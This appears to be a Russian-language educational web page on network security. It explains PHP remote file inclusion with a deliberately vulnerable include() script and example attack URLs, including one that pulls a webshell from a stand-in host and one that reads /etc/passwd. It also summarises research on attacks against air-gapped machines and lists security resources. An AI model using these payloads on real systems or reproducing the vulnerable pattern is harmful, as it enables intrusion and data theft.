 |
RFI-атака. Вставление удаленного файла
|
|
|
|
Атака типа RFI чаще всего предпринимается против WEB-серверов, см. Remote file inclusion. При этом обычно используется скрипт на атакуемом сайте. Уязвимость связана с недостаточно тщательной проверкой параметров скрипта, поступающих извне. В случае PHP главной причиной является недостаточный контроль значений внешних переменных, таких как $_GET, $_POST, $_COOKIE. Язык PHP имеет директиву allow_url_fopen, и, если она сделана допустимой, то файловой системе разрешается использовать URL, который позволяет системе брать данные из удаленного источника. Ниже приведены примеры, взятые из wikipedia (см. вышеприведенную ссылку).
Рассмотрим PHP-скрипт (который включает файл, специфицированный в запросе):
<?php
$color = 'blue';
if (isset($_GET['COLOR']))
$color = $_GET['COLOR'];
include($color. '.php');
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
Разработчик предполагал использование в качестве опций только blue.php и red.php. Но кто-то может вставить произвольные значения в COLOR, появляется возможность вставить код из файлов:
· /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - вставляет удаленно размещенный файл, содержащий вредоносный код.
· /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Выполняет код из уже загруженного файла с именем exploit.php (уязвимость вставления локального файла)
· /vulnerable.php?COLOR=C:\\notes.txt%00 - пример использования мета-символа NUL, чтобы удалить суффикс.php, разрешая доступ к файлам, отличным от.php.
· /vulnerable.php?COLOR=/etc/passwd%00 - позволяет атакеру читать содержимое файла паролей UNIX-системы (directory traversal).
Объем рынка компьютерных преступлений в России достигает 1 млрд долл в год (2011 год).
Представители разведки США считают, что основной угрозой для США сегодня являются кибер атаки (James Clapper, руководитель национальной безопасности администрации Обамы и Robert Mueller, директор ФБР).
|
|
|
Несанкционированный доступ в машины, отключенные от Интернет
Большинство пользователей Интернет убеждено, что машина, неподключенная к какой-либо сети, находится вне опасности. Это не всегда так.
Ваш компьютер может быть внутри цилиндра Фарадея за 3-метровой бетонной стеной, с автономным источником питания и все-же он может оставаться уязвимым даже в отсутствии в помещении микрофонов, телефонов, камер наблюдения и пр. (см. " Are sound attacks extracting decryption keys an enterprise threat or farce? ", Nick Lewis, Enterprise Threats). Разумеется, этот уровень угроз существенен только для защиты государственных тайн. Исследования показали, что при выполнении определенных математических операций, компьютер генерирует детектируемый, хорошо структурируемый шум. Этот шум может регистрироваться на расстоянии примерно 13 футов. Это позволило исследователям извлечь из laptop 4096-битовый ключ RSA.
Выяснилось, что можно управлять машиной, отключенной от Интернет. Для этого машина должна быть заражена определенным вредоносным кодом и подключена к сканеру или многофункциональному принтеру (см. " All-in-one printers can be used to control infected air-gapped systems from far away ", Lucian Constantin, IDG News Service, October 16, 2014). Для управления используются вспышки видимого или инфракрасного света, направленные на покрывающий экран сканера. Выяснилось, что такие вспышки генерируют серию белых линий на темном фоне. Причем их толщина зависит от длительности вспышек света. Используя последовательность подобных вспышек, можно передать сканеру двоичный код. Вредоносная программа может периодически в определенное время, например, ночью, запускать процедуру сканирования. Выяснилось, что несколько сот бит данных может быть передано за одну операцию сканирования. Исследователи успешно опробовали атаку при расстоянии 200, 900 и 1200 метров до управляемого компьютера. Эксперимент был выполнен в Beersheba в Израиле. Для передачи вспышек использовался лазер. Подняв мощность лазера можно увеличить расстояние управления до 5 км.
|
|
|
Полезные ссылки
· Web Application Security Statistics
· Spyware in the Enterprise: The Problem and the Solution
· A Crawler-based Study of Spyware on the Web, University of Washington
· Spyware, US-CERT
· Anti-Spyware Coalition Definitions Document, Anti-Spyware Coalition
· Spyware Enforcement, Center for Democracy and Technology
· Взлом Web 2.0: проникновение в Intranet, определение IP
· Vulnerability Summary for the Week of June 18, 2007
· Understanding Hidden Threats: Rootkits and Botnets
· Recognizing and Avoiding Spyware
· QUARTERLY TRENDS AND ANALYSIS REPORT (Доклад CERT за первый квартал 2007 года)
· US-CERT security tip
· Antimalware E-Guide
· Лаборатория Касперского
· www.stbernard.com
· Global Threat Research Report: Russia
· Корпоративная преступность вытесняет компьютерное мошенничество
· Сервер компании Symantec
· Федеральный план обеспечения сетевой и информационной безопасности США (2006 год). Материал рассчитан на чиновников, ответственных за политику безопасности.
· Центр реагирования на компьютерные инциденты Российской Федерации. Для знакомства с материалами необходима регистрация.
· ibm.com (безопасность WEB-приложений).
· Gregg Keizer, TechWeb Technology News, January 24, 2006, “Botnet Creator Pleads Guilty, Faces 25 Years,”.
· ModSecurity
· AQTRONIX WebKnight
· Web Application Security Consortium
· Symantec, white_papers
· Security Focus WEB-site
· Protecting Against Evolving Web Threats
· База данных WHID - Web Hacking Incident Database
· Проект Bugtraq
· XSSed
· WEB Applications Security Consortium's Statistics Project
· Сайт с описаниями новинок антивирусов, анти-SPAM, анти-spyware и пр.
· Вирусный бюллетень.
· Security Technical Implementation Guides (STIG. (полезно просмотреть при выработке политики сетевой безопасности) в часности, например, WINDOWS Desktop Application. Security Technical Implimentation Guide
· Breach Security Labs
· Web hacking incident database (WHID).
· VB100 (virus) test procedures.
· Antivirus and Security White Papers.
· EXCERPTS FROM VIRUS BULLETIN COMPARATIVE REVIEWS FEBRUARY – JUNE 2010. Таблицы сопоставления эффективности различных антивирусных средств при детективровании разных вредоносных кодов. (Подготовлено компанией ESET)
· Microsoft Security Intelligence Report Volume 8 July through December 2009.
· Network Attack and Defense. Attributed by Roger Needham and Butler Lampson Хороший обзор по сетевым атакам и средствам противодействия (24 стр.).
· Список зараженных и потенциально опасных доменов. Осторожно! (лучше не заходить)
· The National Strategy to Secure Cyberspace
|
|
|
· Крис Каперски. Техника сетевых атак. Солон-Р. 2001
· Guidance for Addressing Malicious Code Risk
· Malicious Code Detection: BRIC Breaking Through Static Analysis
На сервере US-CERT можно найти много других полезных материалов и обзоров по тематике сетевой безопасности, в частности, о пробеме инсайдерских атак. Проблема инсайдеров должна быть одним из наиважнейших пунктов политики безопасности любой организации.
|
|
|
